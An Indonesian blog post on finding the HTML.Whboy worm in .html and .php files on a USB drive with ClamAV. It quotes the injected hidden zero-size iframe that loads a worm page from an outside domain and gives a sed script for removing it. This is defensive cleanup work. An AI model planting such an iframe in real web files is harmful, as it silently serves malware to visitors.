Worm HTML.Whboy


Saya menggunakan ClamAV di linux saya. Karena penasaran, saya coba scan flash disk yang sering saya gunakan untuk tempat data jika sedang mengajar di lab komputer. Komputer di lab menggunakan WindowsXP. Dari hasil scan, ClamAV memberitahukan bahwa sekian file berekstensi .html dan .php telah terjangkit worm bernama HTML.Whboy. Waduh…apa bener sich? Bagian mana dari .html yang dikatakan telah kena worm tersebut? Lalu saya buka salah satu file .html dan salah satu .php yang dilaporkan terjangkit worm.😀 ternyata memang ada sebuah elemen <iframe> yang ditambahkan oleh si virus. Berikut elemen tersebut :

<iframe src=http://www.krvkr.com/worm.htm width=0 height=0></iframe>

Lalu saya coba cari-cari cara atau opsi pada ClamAV yang dapat digunakan untuk membuang worm itu secara otomatis. Ternyata tidak nemu juga opsinya. Berikut perintah yang sering saya gunakan adalah:

shellprompt$ clamscan --recursive --infected path

Jika ada rekan-rekan lain yang tahu opsinya sudikah juga share ke saya? Yang bisa saya lakukan adalah mengkarantina file-file yang terjangkit virus/worm. Yahh.. sekarang ini tinggal find and replace aja untuk menghilangkan.

#!/bin/sh

mv $1 $1.old
sed -r 's/<iframe src=http:\/\/www\.krvkr\.com\/worm\.htm width=0 height=0><\/iframe>/ /ig' $1.old > $1
rm $1.old

Shell Script sederhana di atas saya simpan dengan nama remwhboy.sh (perlu penambahan fungsi). Lalu saya jalankan dengan

$ chmod 755 remwhboy.sh
$ ./remwhboy.sh /path/file/terkena/HTML.Whboy

ClamAV merupakan program antivirus opensource yang sangat bagus untuk mendeteksi virus, dan mendukung multiplatform. Kalau di lingkungan Windows, kita pasti sudah tidak asing dengan berbagai merk aplikasi antivirus, karena memang harus ada. Kalau di linux, selama ini saya tidak punya masalah dengan virus.